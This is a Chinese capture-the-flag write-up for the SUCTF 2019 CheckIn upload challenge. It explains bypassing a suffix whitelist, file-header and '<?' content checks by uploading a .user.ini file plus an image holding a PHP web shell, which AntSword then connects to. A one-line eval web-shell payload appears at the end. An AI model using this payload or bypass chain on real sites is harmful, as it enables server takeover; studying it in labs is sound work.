练[SUCTF 2019]CheckIn

[SUCTF 2019]CheckIn

文章目录

      • [SUCTF 2019]CheckIn
      • 掌握知识
      • 解题思路
      • 关键paylaod

练[SUCTF 2019]CheckIn_第1张图片

掌握知识

.user.ini文件上传利用–需要上传目录有一个php文件(index.php),文件头绕过,文件内容<?检测

解题思路

  1. 打开题目链接,发现又是一个上传文件题目,继续上传改后缀的一句话木马,然后抓包,修改php后缀发现返回非法后缀名,尝试phtml.php3.php6...都没成功,看来是白名单了。

练[SUCTF 2019]CheckIn_第2张图片

  1. 只好尝试上传一下jpg文件查看一下其他过滤和上传目录,发现还存在文件头检测和对文件内容的检测。文件头添加GIF89a?即可绕过,的检测可以继续使用js代码执行php代码的方式

练[SUCTF 2019]CheckIn_第3张图片

练[SUCTF 2019]CheckIn_第4张图片

  1. 上传正常格式的jpg文件后,发现回显了上传目录和目录结构发现了index.php文件。那看来是使用.user.ini文件了,该文件能够实现文件包含内容,前提就是上传的目录下有一个php文件,这样使用.user.ini包含的文件就可以执行文件内的php代码了

练[SUCTF 2019]CheckIn_第5张图片

  1. 利用方法已经明白,接着就上传.user.inishell.jpg文件即可,绕过文件头和文件内容即可成功上传

练[SUCTF 2019]CheckIn_第6张图片

练[SUCTF 2019]CheckIn_第7张图片

  1. 现在目录下存在.user,ini配置文件,index.phpphp文件,和含有恶意代码的jpg文件,只需要访问该php文件即可自动包含jpg文件执行其中的恶意代码,所以蚁剑连接的地址也是该php文件。直接蚁剑连接,在根目录下拿下flag

image-20231003162717873

练[SUCTF 2019]CheckIn_第8张图片

练[SUCTF 2019]CheckIn_第9张图片

关键paylaod

<script language="php">eval($_POST['a']);</script>

GIF89a?

你可能感兴趣的:(buuctf刷题,web安全,php,网络安全,笔记,其他)